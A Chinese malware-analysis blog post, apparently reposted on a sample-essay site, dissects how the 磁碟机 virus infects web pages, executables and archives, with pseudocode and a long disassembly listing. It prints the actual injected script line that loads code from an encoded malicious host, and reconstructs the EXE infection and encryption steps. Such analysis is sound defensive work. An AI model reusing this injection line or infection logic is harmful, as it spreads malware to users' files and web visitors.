2000字范文，分享全网优秀范文，学习好帮手！

2000字范文 XML 网站地图

全站

首页 50字 100字 200字 300字 400字 500字 600字 700字 800字 900字 1000字 1500字 2000字

推荐专题：

2000字范文 > com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 第一博

com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 第一博

时间：2019-10-10 10:16:27

相关推荐

com/lsass.exe smss.exe(磁碟机病毒) 感染方式之我分析 -- 第一博

为XXX研究所提供技术支持时截获的样本，com/lsass.exe smss.exe，病毒中文名为磁碟机病毒，貌似很强，此等病毒岂能错过，分析之，不感独乐，遂将感染方式贴上：

感染文件类型：(文件全名后三位)

1 .htm, tml, .js

2 .exe

3 .rar, .zip

web文件感染函数:

1 按行读取web文件内容

2 如果没有找到匹配的：document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>"); 则在文件尾部加上这一句。

exe文件感染函数:

被感染的文件包括三个部分：

1）被修改图标资源的病毒体

2）被加密的原文件

3）病毒体

1 取C:/WINDOWS/system32/Com/LSASS.EXE文件信息。

2 读取C:/WINDOWS/system32/Com/LSASS.EXE文件到内存，并修改相应的资源内容，然后写到com/~临时文件中。

3 取待感染文件信息（后面修改文件时间用）。

4 读取待感染文件内容到内存，并进行加密，然后追加到com/~临时文件中。

5 再将C:/WINDOWS/system32/Com/LSASS.EXE文件读入内存，并加密写到com/~临时文件中。

6 将C:/WINDOWS/system32/Com/~临时文件拷贝到被感染文件位置。

//Add on 22:57 -1-9

对EXE的加密算法：

dwStart = 21B

g_dwVFileSize

g_dwNeedFilePos

bInfect = TRUE;

/* 每读取g_dwVFileSize个字节再加密的。

*

*/

while (fread(g_dwNeedFilePos/*pBuf*/, 1, g_dwVFileSize, file))

{

if (!bInfect) break;

ECX = dwStart;

ECX += 0x09;

while (1)

{

dwTmp = ECX;

if ECX > g_dwVFileSize

break;

EDX = g_dwNeedFilePos;

ECX += EDX;

byte tmp = Get [ECX];

not tmp;

Set [ECX], tmp;

ECX = dwTmp;

ECX += 0x0B;

}

ECX = 0;

dwTmp = ECX;

if g_dwVFileSize <= ECX

goto aa;

do

{

EDX = g_dwNeedFilePos;

ECX += EDX;

byte tmp = Get[ECX];

not tmp;

Set [ECX], tmp;

ECX = dwTmp;

ECX += 2;

if (ECX >= g_dwVFileSize)

break;

} while (1)

aa:

bInfect = FALSE;

}

//Add end 22:57 -1-9

具体分析见如下代码及注释：

/

1 遍历文件函数

00402200 |. 8D85 F4FDFFFF LEA EAX,DWORD PTR SS:[EBP-20C]

00402206 |. 50 PUSH EAX ; /pFindFileData

00402207 |. FF75 CC PUSH DWORD PTR SS:[EBP-34] ; |FileName

0040220A |. FF15 08A14000 CALL DWORD PTR DS:[<&KERNEL32.FindFirstFileA>] ; /FindFirstFileA

00402210 |. 6A 01 PUSH 1 ; /RemoveMsg = PM_REMOVE

00402212 |. 8945 B8 MOV DWORD PTR SS:[EBP-48],EAX ; |

00402215 |. 53 PUSH EBX ; |MsgFilterMax

00402216 |. 53 PUSH EBX ; |MsgFilterMin

00402217 |. 8D85 D8FDFFFF LEA EAX,DWORD PTR SS:[EBP-228] ; |

0040221D |. 53 PUSH EBX ; |hWnd

0040221E |. 50 PUSH EAX ; |pMsg

0040221F |. FF15 30A44000 CALL DWORD PTR DS:[<&USER32.PeekMessageA>] ; /PeekMessageA

00402225 |. 837D B8 FF CMP DWORD PTR SS:[EBP-48],-1

00402229 |. 0F84 BC080000 JE LSASS.00402AEB

0040222F |. BF 58E44000 MOV EDI,LSASS.0040E458 ; ASCII "8A;"

00402234 |> 8D85 20FEFFFF /LEA EAX,DWORD PTR SS:[EBP-1E0]

0040223A |. 68 04D14000 |PUSH LSASS.0040D104 ; /s2 = "."

0040223F |. 50 |PUSH EAX ; |s1

00402240 |. E8 0B650000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp

00402245 |. 59 |POP ECX

00402246 |. 85C0 |TEST EAX,EAX

00402248 |. 59 |POP ECX

00402249 |. 0F84 7B080000 |JE LSASS.00402ACA

0040224F |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

00402255 |. 68 00D14000 |PUSH LSASS.0040D100 ; /s2 = ".."

0040225A |. 50 |PUSH EAX ; |s1

0040225B |. E8 F0640000 |CALL <JMP.&MSVCRT.strcmp> ; /strcmp

00402260 |. 59 |POP ECX

00402261 |. 85C0 |TEST EAX,EAX

00402263 |. 59 |POP ECX

00402264 |. 0F84 60080000 |JE LSASS.00402ACA

0040226A |. F685 F4FDFFFF 10 |TEST BYTE PTR SS:[EBP-20C],10

00402271 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

...

004023A7 |. 0F86 1D070000 |JBE LSASS.00402ACA

004023AD |. FF75 C4 |PUSH DWORD PTR SS:[EBP-3C] ; /s2 = "tml"

004023B0 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023B3 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023B9 |. 59 |POP ECX

004023BA |. 85C0 |TEST EAX,EAX

004023BC |. 59 |POP ECX

004023BD |. 0F84 9E060000 |JE LSASS.00402A61

004023C3 |. FF75 C8 |PUSH DWORD PTR SS:[EBP-38] ; /s2 = "htm"

004023C6 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023C9 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023CF |. 59 |POP ECX

004023D0 |. 85C0 |TEST EAX,EAX

004023D2 |. 59 |POP ECX

004023D3 |. 0F84 88060000 |JE LSASS.00402A61

004023D9 |. 68 ACD14000 |PUSH LSASS.0040D1AC ; /s2 = ".js"

004023DE |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004023E1 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004023E7 |. 59 |POP ECX

004023E8 |. 85C0 |TEST EAX,EAX

004023EA |. 59 |POP ECX

004023EB |. 75 6D |JNZ SHORT LSASS.0040245A

004023ED |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000 ; web file infect

004023F7 |. 0F83 CD060000 |JNB LSASS.00402ACA

004023FD |. 51 |PUSH ECX

004023FE |. 8D86 9D010000 |LEA EAX,DWORD PTR DS:[ESI+19D]

00402404 |. 8BCC |MOV ECX,ESP

00402406 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

00402409 |. 50 |PUSH EAX

0040240A |. E8 FB610000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

0040240F |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

00402412 |. 68 08D14000 |PUSH LSASS.0040D108

00402417 |. 50 |PUSH EAX

00402418 |. 8D85 50FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B0]

0040241E |. 50 |PUSH EAX

0040241F |. C645 FC 11 |MOV BYTE PTR SS:[EBP-4],11

00402423 |. E8 06620000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402428 |. 51 |PUSH ECX

00402429 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

0040242F |. 8BCC |MOV ECX,ESP

00402431 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP

00402434 |. 52 |PUSH EDX

00402435 |. 50 |PUSH EAX

00402436 |. 51 |PUSH ECX

00402437 |. C645 FC 12 |MOV BYTE PTR SS:[EBP-4],12

0040243B |. E8 EE610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402440 |. 8BCE |MOV ECX,ESI

00402442 |. C645 FC 13 |MOV BYTE PTR SS:[EBP-4],13

00402446 |. E8 4C070000 |CALL LSASS.00402B97 ; web file infect function

0040244B |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040244F |. 8D8D 50FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B0]

00402455 |. E9 6B060000 |JMP LSASS.00402AC5

0040245A |> 68 A8D14000 |PUSH LSASS.0040D1A8 ; /s2 = "exe"

0040245F |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

00402462 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

00402468 |. 59 |POP ECX

00402469 |. 85C0 |TEST EAX,EAX

0040246B |. 59 |POP ECX

0040246C |. 0F85 6C010000 |JNZ LSASS.004025DE ; exe infect

00402472 |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]

00402478 |. 68 5CE44000 |PUSH LSASS.0040E45C ; ASCII "C:/WINDOWS/system32/com/LSASS.EXE"

0040247D |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX

00402480 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]

00402486 |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX

00402489 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]

0040248F |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX

00402492 |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]

00402498 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX

0040249B |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]

004024A1 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX

004024A4 |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]

004024AA |. 8D8E 78010000 |LEA ECX,DWORD PTR DS:[ESI+178]

004024B0 |. 889E B3010000 |MOV BYTE PTR DS:[ESI+1B3],BL

004024B6 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX

004024B9 |. E8 5E610000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>

004024BE |. 68 A4D14000 |PUSH LSASS.0040D1A4 ; ASCII "/~"

004024C3 |. 8D85 48FFFFFF |LEA EAX,DWORD PTR SS:[EBP-B8]

004024C9 |. 57 |PUSH EDI

004024CA |. 50 |PUSH EAX

004024CB |. E8 5E610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004024D0 |. 8D8E 7C010000 |LEA ECX,DWORD PTR DS:[ESI+17C]

004024D6 |. 50 |PUSH EAX

004024D7 |. C645 FC 14 |MOV BYTE PTR SS:[EBP-4],14

004024DB |. E8 42610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004024E0 |. 8D8D 48FFFFFF |LEA ECX,DWORD PTR SS:[EBP-B8]

004024E6 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

004024EA |. E8 0D600000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004024EF |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

004024F5 |. 50 |PUSH EAX

004024F6 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

004024F9 |. 50 |PUSH EAX

004024FA |. 8D85 40FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C0]

00402500 |. 50 |PUSH EAX

00402501 |. E8 28610000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402506 |. 8D8E 74010000 |LEA ECX,DWORD PTR DS:[ESI+174]

0040250C |. 50 |PUSH EAX

0040250D |. C645 FC 15 |MOV BYTE PTR SS:[EBP-4],15

00402511 |. E8 0C610000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00402516 |. 8D8D 40FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C0]

0040251C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402520 |. E8 D75F0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402525 |. 8BCE |MOV ECX,ESI

00402527 |. E8 1C3E0000 |CALL LSASS.00406348 ; exe file infect function

0040252C |. 84C0 |TEST AL,AL

0040252E |. 74 04 |JE SHORT LSASS.00402534

00402530 |. C645 EF 01 |MOV BYTE PTR SS:[EBP-11],1

00402534 |> 389E B3010000 |CMP BYTE PTR DS:[ESI+1B3],BL

0040253A |. 0F84 8C000000 |JE LSASS.004025CC

00402540 |. 53 |PUSH EBX

00402541 |. 51 |PUSH ECX

00402542 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

00402548 |. 8BC4 |MOV EAX,ESP

0040254A |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

0040254D |. 51 |PUSH ECX

0040254E |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]

00402551 |. 51 |PUSH ECX

00402552 |. 50 |PUSH EAX

00402553 |. E8 D6600000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402558 |. E8 64F8FFFF |CALL LSASS.00401DC1 ; setFileAttributes

0040255D |. 59 |POP ECX

0040255E |. 8D86 74010000 |LEA EAX,DWORD PTR DS:[ESI+174]

00402564 |. 8BCC |MOV ECX,ESP

00402566 |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

00402569 |. 50 |PUSH EAX

0040256A |. E8 9B600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

0040256F |. 51 |PUSH ECX

00402570 |. 8D86 7C010000 |LEA EAX,DWORD PTR DS:[ESI+17C]

00402576 |. 8BCC |MOV ECX,ESP

00402578 |. 8965 D0 |MOV DWORD PTR SS:[EBP-30],ESP

0040257B |. 50 |PUSH EAX

0040257C |. C645 FC 16 |MOV BYTE PTR SS:[EBP-4],16

00402580 |. E8 85600000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00402585 |. 8BCE |MOV ECX,ESI

00402587 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040258B |. E8 4E070000 |CALL LSASS.00402CDE ; copy com/~ to original path

00402590 |. 8B86 74010000 |MOV EAX,DWORD PTR DS:[ESI+174]

00402596 |. 53 |PUSH EBX ; /hTemplateFile

00402597 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL

0040259C |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING

0040259E |. 53 |PUSH EBX ; |pSecurity

0040259F |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

004025A1 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

004025A6 |. 50 |PUSH EAX ; |FileName

004025A7 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA

004025AD |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]

004025B0 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX

004025B3 |. 51 |PUSH ECX ; /pLastWrite

004025B4 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |

004025B7 |. 51 |PUSH ECX ; |pLastAccess

004025B8 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |

004025BB |. 51 |PUSH ECX ; |pCreationTime

004025BC |. 50 |PUSH EAX ; |hFile

004025BD |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime

004025C3 |. FF75 D0 |PUSH DWORD PTR SS:[EBP-30] ; /hObject

004025C6 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle

004025CC |> FFB6 7C010000 |PUSH DWORD PTR DS:[ESI+17C] ; /path

004025D2 |. FF15 58A34000 |CALL DWORD PTR DS:[<&MSVCRT._unlink>] ; /_unlink

004025D8 |. 59 |POP ECX

004025D9 |. E9 EC040000 |JMP LSASS.00402ACA

004025DE |> 68 A0D14000 |PUSH LSASS.0040D1A0 ; /s2 = "rar"

004025E3 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004025E6 |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

004025EC |. 59 |POP ECX

004025ED |. 85C0 |TEST EAX,EAX

004025EF |. 59 |POP ECX

004025F0 |. 74 18 |JE SHORT LSASS.0040260A

004025F2 |. 68 9CD14000 |PUSH LSASS.0040D19C ; /s2 = "zip"

004025F7 |. FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |s1

004025FA |. FF15 9CA34000 |CALL DWORD PTR DS:[<&MSVCRT._mbsicmp>] ; /_mbsicmp

00402600 |. 59 |POP ECX

00402601 |. 85C0 |TEST EAX,EAX

00402603 |. 59 |POP ECX

00402604 |. 0F85 C0040000 |JNZ LSASS.00402ACA

0040260A |> 8B86 A6010000 |MOV EAX,DWORD PTR DS:[ESI+1A6]

00402610 |. 68 10F44000 |PUSH LSASS.0040F410 ; /s2 = "c:/program files/winrar/winrar.exe"

00402615 |. 50 |PUSH EAX ; |s1

00402616 |. FF15 A0A34000 |CALL DWORD PTR DS:[<&MSVCRT._mbscmp>] ; /_mbscmp

0040261C |. 59 |POP ECX

0040261D |. 85C0 |TEST EAX,EAX

0040261F |. 59 |POP ECX

00402620 |. 0F84 A4040000 |JE LSASS.00402ACA

00402626 |. 399E AA010000 |CMP DWORD PTR DS:[ESI+1AA],EBX ; rar, zip file infect

0040262C |. 0F8F 98040000 |JG LSASS.00402ACA

00402632 |. 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],500000

0040263C |. 0F87 88040000 |JA LSASS.00402ACA

00402642 |. 8D85 20FEFFFF |LEA EAX,DWORD PTR SS:[EBP-1E0]

00402648 |. 50 |PUSH EAX

00402649 |. 8D45 08 |LEA EAX,DWORD PTR SS:[EBP+8]

0040264C |. 50 |PUSH EAX

0040264D |. 8D85 34FFFFFF |LEA EAX,DWORD PTR SS:[EBP-CC]

00402653 |. 50 |PUSH EAX

00402654 |. E8 D55F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402659 |. 50 |PUSH EAX

0040265A |. 8D4D D8 |LEA ECX,DWORD PTR SS:[EBP-28]

0040265D |. C645 FC 17 |MOV BYTE PTR SS:[EBP-4],17

00402661 |. E8 BC5F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00402666 |. 8D8D 34FFFFFF |LEA ECX,DWORD PTR SS:[EBP-CC]

0040266C |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402670 |. E8 875E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402675 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

0040267A |. 8D85 7CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-84]

00402680 |. 57 |PUSH EDI

00402681 |. 50 |PUSH EAX

00402682 |. E8 A75F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402687 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

0040268D |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18

00402691 |. 51 |PUSH ECX

00402692 |. 50 |PUSH EAX

00402693 |. 8D85 54FFFFFF |LEA EAX,DWORD PTR SS:[EBP-AC]

00402699 |. 50 |PUSH EAX

0040269A |. E8 8F5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040269F |. 68 08D14000 |PUSH LSASS.0040D108

004026A4 |. 50 |PUSH EAX

004026A5 |. 8D45 94 |LEA EAX,DWORD PTR SS:[EBP-6C]

004026A8 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19

004026AC |. 50 |PUSH EAX

004026AD |. E8 7C5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004026B2 |. 50 |PUSH EAX

004026B3 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

004026B6 |. C645 FC 1A |MOV BYTE PTR SS:[EBP-4],1A

004026BA |. E8 635F0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004026BF |. 8D4D 94 |LEA ECX,DWORD PTR SS:[EBP-6C]

004026C2 |. C645 FC 19 |MOV BYTE PTR SS:[EBP-4],19

004026C6 |. E8 315E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026CB |. 8D8D 54FFFFFF |LEA ECX,DWORD PTR SS:[EBP-AC]

004026D1 |. C645 FC 18 |MOV BYTE PTR SS:[EBP-4],18

004026D5 |. E8 225E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026DA |. 8D8D 7CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-84]

004026E0 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

004026E4 |. E8 135E0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004026E9 |. 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]

004026EC |. 50 |PUSH EAX

004026ED |. 8D85 6CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-94]

004026F3 |. 68 8CD14000 |PUSH LSASS.0040D18C ; ASCII " X ""

004026F8 |. 50 |PUSH EAX

004026F9 |. E8 365F0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>

004026FE |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""

00402703 |. 50 |PUSH EAX

00402704 |. 8D85 4CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-B4]

0040270A |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B

0040270E |. 50 |PUSH EAX

0040270F |. E8 1A5F0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402714 |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

00402717 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C

0040271B |. 51 |PUSH ECX

0040271C |. 50 |PUSH EAX

0040271D |. 8D85 74FFFFFF |LEA EAX,DWORD PTR SS:[EBP-8C]

00402723 |. 50 |PUSH EAX

00402724 |. E8 FF5E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

00402729 |. 68 74D14000 |PUSH LSASS.0040D174 ; ASCII "" -r -inul -ibck -y"

0040272E |. 50 |PUSH EAX

0040272F |. 8D85 3CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-C4]

00402735 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D

00402739 |. 50 |PUSH EAX

0040273A |. E8 EF5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040273F |. C645 FC 1E |MOV BYTE PTR SS:[EBP-4],1E

00402743 |. 50 |PUSH EAX

00402744 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]

00402747 |. E8 D65E0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

0040274C |. 8D8D 3CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-C4]

00402752 |. C645 FC 1D |MOV BYTE PTR SS:[EBP-4],1D

00402756 |. E8 A15D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040275B |. 8D8D 74FFFFFF |LEA ECX,DWORD PTR SS:[EBP-8C]

00402761 |. C645 FC 1C |MOV BYTE PTR SS:[EBP-4],1C

00402765 |. E8 925D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040276A |. 8D8D 4CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-B4]

00402770 |. C645 FC 1B |MOV BYTE PTR SS:[EBP-4],1B

00402774 |. E8 835D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402779 |. 8D8D 6CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-94]

0040277F |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402783 |. E8 745D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402788 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]

0040278B |. 50 |PUSH EAX

0040278C |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]

00402792 |. 50 |PUSH EAX

00402793 |. 8D85 38FFFFFF |LEA EAX,DWORD PTR SS:[EBP-C8]

00402799 |. 50 |PUSH EAX

0040279A |. E8 895E0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

0040279F |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src

004027A1 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004027A7 |. 50 |PUSH EAX ; |dest

004027A8 |. E8 5F5F0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy

004027AD |. 59 |POP ECX

004027AE |. 59 |POP ECX

004027AF |. 8D8D 38FFFFFF |LEA ECX,DWORD PTR SS:[EBP-C8]

004027B5 |. E8 425D0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004027BA |. 53 |PUSH EBX ; /Arg5

004027BB |. 53 |PUSH EBX ; |Arg4

004027BC |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004027C2 |. 53 |PUSH EBX ; |Arg3

004027C3 |. 50 |PUSH EAX ; |Arg2

004027C4 |. 53 |PUSH EBX ; |Arg1

004027C5 |. 8BCE |MOV ECX,ESI ; |

004027C7 |. E8 2F410000 |CALL LSASS.004068FB ; /LSASS.004068FB

004027CC |. 85C0 |TEST EAX,EAX ; unpack rar/zip file

004027CE |. 74 40 |JE SHORT LSASS.00402810

004027D0 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

004027D5 |. 8D85 64FFFFFF |LEA EAX,DWORD PTR SS:[EBP-9C]

004027DB |. 57 |PUSH EDI

004027DC |. 50 |PUSH EAX

004027DD |. E8 4C5E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004027E2 |. 51 |PUSH ECX

004027E3 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

004027E9 |. 8BCC |MOV ECX,ESP

004027EB |. 8965 E4 |MOV DWORD PTR SS:[EBP-1C],ESP

004027EE |. 52 |PUSH EDX

004027EF |. 50 |PUSH EAX

004027F0 |. 51 |PUSH ECX

004027F1 |. C645 FC 1F |MOV BYTE PTR SS:[EBP-4],1F

004027F5 |. E8 345E0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004027FA |. 8BCE |MOV ECX,ESI

004027FC |. E8 E0F5FFFF |CALL LSASS.00401DE1

00402801 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402805 |. 8D8D 64FFFFFF |LEA ECX,DWORD PTR SS:[EBP-9C]

0040280B |. E9 B5020000 |JMP LSASS.00402AC5

00402810 |> A1 08F44000 |MOV EAX,DWORD PTR DS:[40F408]

00402815 |. 51 |PUSH ECX

00402816 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX

00402819 |. A1 04F44000 |MOV EAX,DWORD PTR DS:[40F404]

0040281E |. FF86 AA010000 |INC DWORD PTR DS:[ESI+1AA]

00402824 |. 8945 D0 |MOV DWORD PTR SS:[EBP-30],EAX

00402827 |. 8D45 DC |LEA EAX,DWORD PTR SS:[EBP-24]

0040282A |. 8BCC |MOV ECX,ESP

0040282C |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

0040282F |. 50 |PUSH EAX

00402830 |. E8 D55D0000 |CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00402835 |. 8BCE |MOV ECX,ESI

00402837 |. E8 85F8FFFF |CALL LSASS.004020C1

0040283C |. 8B45 D0 |MOV EAX,DWORD PTR SS:[EBP-30]

0040283F |. 3905 04F44000 |CMP DWORD PTR DS:[40F404],EAX

00402845 |. 7F 4B |JG SHORT LSASS.00402892

00402847 |. 8B45 E4 |MOV EAX,DWORD PTR SS:[EBP-1C]

0040284A |. 3905 08F44000 |CMP DWORD PTR DS:[40F408],EAX

00402850 |. 7F 40 |JG SHORT LSASS.00402892

00402852 |. 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

00402857 |. 8D85 5CFFFFFF |LEA EAX,DWORD PTR SS:[EBP-A4]

0040285D |. 57 |PUSH EDI

0040285E |. 50 |PUSH EAX

0040285F |. E8 CA5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402864 |. 51 |PUSH ECX

00402865 |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

0040286B |. 8BCC |MOV ECX,ESP

0040286D |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402870 |. 52 |PUSH EDX

00402871 |. 50 |PUSH EAX

00402872 |. 51 |PUSH ECX

00402873 |. C645 FC 26 |MOV BYTE PTR SS:[EBP-4],26

00402877 |. E8 B25D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040287C |. 8BCE |MOV ECX,ESI

0040287E |. E8 5EF5FFFF |CALL LSASS.00401DE1

00402883 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402887 |. 8D8D 5CFFFFFF |LEA ECX,DWORD PTR SS:[EBP-A4]

0040288D |. E9 C000 |JMP LSASS.00402A54

